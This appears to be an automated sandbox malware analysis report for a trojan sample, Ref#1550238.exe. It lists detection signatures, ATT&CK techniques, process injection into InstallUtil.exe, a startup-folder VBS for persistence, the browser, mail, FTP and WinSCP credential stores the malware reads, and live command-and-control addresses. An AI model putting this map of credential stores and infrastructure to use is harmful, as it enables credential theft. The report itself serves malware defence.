                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3908, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior

                      Remote Access Functionality

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 5520, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 3908, type: MEMORYSTR
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 211 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 311 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1567423, Sample: Ref#1550238.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100
Top-level DNS/IP: oshi.at; api.ipify.org
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
• Ref#1550238.exe (started)
  DNS/IP: oshi.at 194.15.112.248, 443, 49710, 49714 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine
  Dropped: C:\Users\user\AppData\Roaming\vdvfyt.exe, PE32
  Dropped: C:\Users\user\...\vdvfyt.exe:Zone.Identifier, ASCII
  Dropped: C:\Users\user\AppData\Roaming\...\vdvfyt.vbs, ASCII
  Signatures: Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
  Started: InstallUtil.exe
• InstallUtil.exe (started by Ref#1550238.exe)
  DNS/IP: 162.254.34.31, 49713, 49720, 587 VIVIDHOSTINGUS United States
  DNS/IP: api.ipify.org 104.26.13.205, 443, 49712, 49719 CLOUDFLARENETUS United States
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access)
• wscript.exe (started)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: vdvfyt.exe
• vdvfyt.exe (started by wscript.exe)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; Injects a PE file into a foreign processes
  Started: InstallUtil.exe
• InstallUtil.exe (started by vdvfyt.exe)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
Ref#1550238.exe | 45% | ReversingLabs | Win32.Trojan.Generic
Ref#1550238.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\vdvfyt.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\vdvfyt.exe | 45% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://oshi.at | 0% | Avira URL Cloud | safe
https://oshi.at/EqqP | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
oshi.at | 194.15.112.248 | true | false | | unknown
api.ipify.org | 104.26.13.205 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://oshi.at/EqqP | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://stackoverflow.com/q/14436606/23354 | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.00000000036A7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsps.ssl.com0? | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
https://github.com/mgravell/protobuf-net | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://oshi.at | Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
http://ocsps.ssl.com0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
https://api.ipify.org/t | InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
https://api.ipify.org | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
https://github.com/mgravell/protobuf-neti | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp | false | | high
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
https://stackoverflow.com/q/11564914/23354; | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://www.ssl.com/repository0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
http://ocsps.ssl.com0_ | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0 | Ref#1550238.exe, vdvfyt.exe.0.dr | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
194.15.112.248 | oshi.at | Ukraine | 213354 | INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567423
Start date and time: 2024-12-03 15:14:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#1550238.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 90%
                                                                        • Number of executed functions: 426
                                                                        • Number of non-executed functions: 35
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes were analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Ref#1550238.exe

Time | Type | Description
15:16:05 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
194.15.112.248 | KyrazonSetup.exe | malicious | Unknown |
194.15.112.248 | KyrazonSetup.exe | malicious | Unknown |
194.15.112.248 | Order._1.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT |
194.15.112.248 | uVQLD8YVk6.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader |
194.15.112.248 | W73PCbSH71.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader |
104.26.13.205 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.13.205 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | api.ipify.org/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
oshi.at | Swift Payment MT103.lnk | malicious | Unknown | 188.241.120.6
oshi.at | Facturation.exe | malicious | Doenerium | 188.241.120.6
oshi.at | Facturation.exe | malicious | Doenerium | 188.241.120.6
oshi.at | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248
oshi.at | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248
oshi.at | JuneOrder.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT | 5.253.86.15
oshi.at | Order._1.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT | 194.15.112.248
oshi.at | jdconstructnOrderfdp..exe | malicious | Babadeda, PureLog Stealer, Quasar, zgRAT | 188.241.120.6
oshi.at | TamenuV11.msi | malicious | Unknown | 5.253.86.15
api.ipify.org | BuMdSP88Ze.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | SANTANDER%20AUDITORIA.scr.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | main.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | https://dsiete.co/share.html | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | Content Collaboration Terms.dll.exe | malicious | LummaC Stealer | 172.67.74.152
api.ipify.org | https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20== | malicious | Unknown | 104.26.13.205
api.ipify.org | Employee_Important_Message.pdf | malicious | Unknown | 104.26.12.205
api.ipify.org | l6F8Xgr0Ov.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | SPlVyHiGOz.exe | malicious | AgentTesla, DarkTortilla | 172.67.74.152
api.ipify.org | 55qIbHIAZi.exe | malicious | AgentTesla, DarkTortilla | 172.67.74.152
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBKyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.248
                                                                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.248
                                                                                  Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                  • 194.15.112.248
                                                                                  uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                  • 194.15.112.248
                                                                                  W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                  • 194.15.112.248
                                                                                  1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                                                  • 194.15.112.203
                                                                                  bad.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.113.200
                                                                                  FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.70
                                                                                  x.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.113.210
                                                                                  b69SScPQRV.dllGet hashmaliciousBazaLoaderBrowse
                                                                                  • 194.15.113.155
                                                                                  CLOUDFLARENETUSuC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.6
                                                                                  BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.194.230
                                                                                  SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.6
                                                                                  2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.194.230
                                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.201.49
                                                                                  2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.6
                                                                                  New Purchase Order.rtfGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.9
                                                                                  https://swacargo-onlinebooking.hangara.com/reset-password/?token=039295fa7b5c57036e17d5c333688b1e5807c54f2312e5961baa1794Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  VIVIDHOSTINGUSDJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                  • 162.254.34.31
                                                                                  Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                  • 162.254.34.31
                                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 192.26.155.193
                                                                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 162.254.34.31
                                                                                  Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 162.254.34.31
                                                                                  BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 64.190.116.37
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eBuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  No context
                                                                                  Process:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):82
                                                                                  Entropy (8bit):4.837683827995026
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FER/n0eFHHoCHyg4EaKC5NkOAHn:FER/lFHICHhJaZ5WOO
